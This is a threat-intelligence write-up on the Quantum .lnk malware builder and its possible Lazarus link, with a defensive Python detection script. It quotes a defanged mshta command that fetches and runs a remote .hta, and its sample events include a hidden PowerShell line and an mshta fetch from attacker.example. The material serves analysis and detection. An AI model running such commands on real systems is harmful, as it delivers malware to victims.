Possibly associated with Lazarus APT group
Cyble Research Labs has been continuously tracking emerging threats and their delivery mechanisms. We have observed a surge in the use of .lnk files by various malware families. Some of the prevalent malware families that have recently used .lnk files for payload delivery are:
Additionally, we have seen many APT instances where the Threat Actors (TAs) leverage .lnk files for their initial execution to deliver the payload.
.lnk files are shortcut files that reference other files, folders, or applications in order to open them. The TAs leverage .lnk files to drop malicious payloads using LOLBins. LOLBins (Living off the Land Binaries) are binaries native to the Operating System, such as PowerShell and mshta. TAs use these binaries to evade detection mechanisms because the Operating System trusts them.
During our OSINT (Open Source Intelligence) activity, Cyble Research Labs came across a new .lnk builder dubbed “Quantum Software/Quantum Builder.” Figure 1 shows a post made by the Threat Actor on a cybercrime forum.
The TA claims that Quantum Builder can spoof any extension and has over 300 different icons available for malicious .lnk files. Figure 2 shows the pricing details and functionality of the builder.
The TA has created a video demonstrating how to build .lnk, .hta, and .iso files using the Quantum Builder. The .hta payload can be created using Quantum Builder by customizing options such as payload URL details, DLL support, UAC Bypass, execution path and time delay to execute the payload, etc.
The .lnk builder embeds the generated .hta payload and creates a new .lnk file. The builder provides various icons as an option while building the .lnk file. The below figure shows the Quantum .lnk builder.
At the end of this process, the .iso builder is used to create the .iso image containing the .lnk file for further delivery via email and execution.
The TA has also claimed to have implemented a dogwalk n-day exploit. This vulnerability exists in Microsoft Support Diagnostic Tool (MSDT) and could lead to code execution if the user opens a specially crafted .diagcab file, typically sent over emails by TAs. The .diagcab file further downloads a malicious file into the startup folder, which will be executed every time the user logs in.
Further investigation revealed a post shared by the TA, indicating that this sample might be generated using Quantum Builder.
The figure below shows the post made by the TA regarding the above sample.
The sample mentioned in the above post connects to a domain named “quantum-software.online”; the same domain was used by the Quantum TA as a demo site, as shown in the figure below. This indicates that the identified sample was generated using Quantum Builder.
This sample is a Windows Shortcut (.LNK) file. Windows always hides the .lnk extension, so if a file is named file_name.txt.lnk, the user sees only file_name.txt, even when the option to show file extensions is enabled. For this reason, .lnk files are an attractive disguise or smokescreen for TAs.
Upon execution, the .lnk file runs malicious PowerShell code, which uses mshta to execute a .hta file hosted on a remote site.
This script uses a function that deobfuscates the malicious PowerShell script. The function performs a mathematical operation that converts a numeric value into characters. The figure below shows the deobfuscated data.
Command: “C:\Windows\system32\mshta.exe” hxxps[:]//quantum-software[.]online/remote/bdg[.]hta
The infection chain is represented below.
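Two points in the chain above are observable on the endpoint: a shortcut masquerading behind a document extension (file_name.txt.lnk) and mshta.exe being spawned by PowerShell with a remote .hta URL. The following triage logic is an added example written for this article, not code from the original post or from the builder; it runs over constructed Sysmon-style process-creation records, and the URL and paths in them are placeholders.

```python
import ntpath
import re
from typing import Dict, List, Tuple

# Constructed process-creation records in Sysmon Event ID 1 style (example data, not from the post).
# Record 2 mirrors the chain described above: explorer -> .lnk -> powershell -> mshta <remote .hta>.
# The URL is a placeholder, not the infrastructure named in the article.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\explorer.exe" D:\Downloads\invoice_2022.pdf.lnk'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -w hidden -ep bypass -c "<obfuscated stage>"'},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\system32\mshta.exe",
     "CommandLine": r'"C:\Windows\system32\mshta.exe" https://attacker.example/remote/bdg.hta'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\system32\mshta.exe",
     "CommandLine": r'"C:\Windows\system32\mshta.exe" "C:\Program Files\Vendor\help.hta"'},
]

# Extensions a user expects to be the real file type; a trailing .lnk behind one of these is
# the masquerade described above (Windows hides the .lnk suffix even when extensions are shown).
DOC_EXTS = {".pdf", ".txt", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".png", ".zip"}
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)


def has_double_extension(path: str) -> bool:
    """True for names like invoice.pdf.lnk: a document extension hidden behind a shortcut."""
    name = ntpath.basename(path.strip('"')).lower()
    stem, ext = ntpath.splitext(name)
    return ext == ".lnk" and ntpath.splitext(stem)[1] in DOC_EXTS


def lnk_targets(command_line: str) -> List[str]:
    """Extract every .lnk path referenced in a command line."""
    return re.findall(r"\S+\.lnk\b", command_line, re.IGNORECASE)


def is_remote_mshta_from_powershell(event: Dict[str, str]) -> bool:
    """mshta.exe spawned by powershell.exe with an http(s) URL: proxy execution of a remote .hta."""
    image = ntpath.basename(event["Image"]).lower()
    parent = ntpath.basename(event["ParentImage"]).lower()
    return image == "mshta.exe" and parent == "powershell.exe" and bool(REMOTE_URL.search(event["CommandLine"]))


def triage(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """Return (event index, reason) for each record matching one of the .lnk-chain indicators."""
    alerts: List[Tuple[int, str]] = []
    for i, ev in enumerate(events):
        if any(has_double_extension(p) for p in lnk_targets(ev["CommandLine"])):
            alerts.append((i, "double-extension .lnk opened"))
        if is_remote_mshta_from_powershell(ev):
            alerts.append((i, "powershell -> mshta fetching remote .hta"))
    return alerts
```

Record 3, a locally installed .hta opened directly from Explorer, is deliberately left unflagged so that the rule keys on the remote-fetch-from-PowerShell pattern rather than on mshta.exe alone.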
Possible links to Lazarus APT
In recent samples and research on the Lazarus APT, we observed that the TAs were using .lnk files to deliver further-stage payloads. Upon comparing both scripts, we found that the deobfuscation loop and the initialization of variables were the same, indicating a possible connection between Quantum Builder and the Lazarus APT group.
We have observed a steadily increasing number of high-profile TAs shifting back to .lnk files to deliver their payloads. Typically, TAs use LOLBins in such infection mechanisms because it makes detecting malicious activity significantly harder.
The recently discovered MSDT zero-day vulnerability also abused a LOLBin. Within a short window of its first observation in the wild, TAs were leveraging this vulnerability through different attack vectors.
The TA behind Quantum Builder appears to be updating the malicious tool with new attack techniques, making it more attractive to other TAs. We will likely see more usage of such tools in the near future.
We have listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the best practices given below:
- Refrain from opening untrusted links and email attachments without verifying their authenticity.
- Use strong passwords and enforce multi-factor authentication wherever possible.
- Verify the source of files before executing them.
- Turn on the automatic software update feature on your computer, mobile, and other connected devices wherever possible and pragmatic.
- Use a reputed anti-virus and Internet security software package on your connected devices, including PC, laptop, and mobile.
- Conduct regular backup practices and keep those backups offline or in a separate network.
MITRE ATT&CK® Techniques

| Tactic | Technique ID | Technique Name |
|---|---|---|
| Execution | T1059 | Command and Scripting Interpreter |
| Defense Evasion | T1218 | System Binary Proxy Execution |
| Defense Evasion | T1140 | Deobfuscate/Decode Files or Information |
Indicators of Compromise (IOCs)

- Lazarus .lnk file